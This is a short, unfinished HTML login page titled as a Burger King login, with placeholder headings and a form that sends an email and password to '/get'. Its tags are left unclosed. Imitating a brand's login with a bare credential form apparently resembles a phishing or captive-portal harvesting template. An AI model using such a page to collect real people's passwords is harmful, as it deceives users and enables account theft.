<!DOCTYPE html>
<html>
<head>
    <title>Burger King login page</title>
    <style>
        body {
            background-color: blue;
            color: red;
            font-family: Arial, sans-serif;
        }
        form {
            margin-top: 100px;
            text-align: center;
        }
        input[type="text"], input[type="password"] {
            border: none;
            border-radius: 5px;
            padding: 10px;
            margin: 10px;
            width: 300px;
            background-color: white;
            color: black;
        }
        input[type="submit"] {
            background-color: white;
            color: black;
            padding: 10px;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <form action="/get" id="email-form-step">
                    <h1 class="g-h1">titel</h1>
                    <h2 class="g-h2">titel2</h2>
                    <div class="login-content">
                        <input name="email" type="text" class="g-input" placeholder="E-mail" required>
                        <input name="password" type="password" class="g-input" placeholder="Password" required>
                        <div>
                            <button class="gbtn-primary" type="submit">Login</button></body>
</html>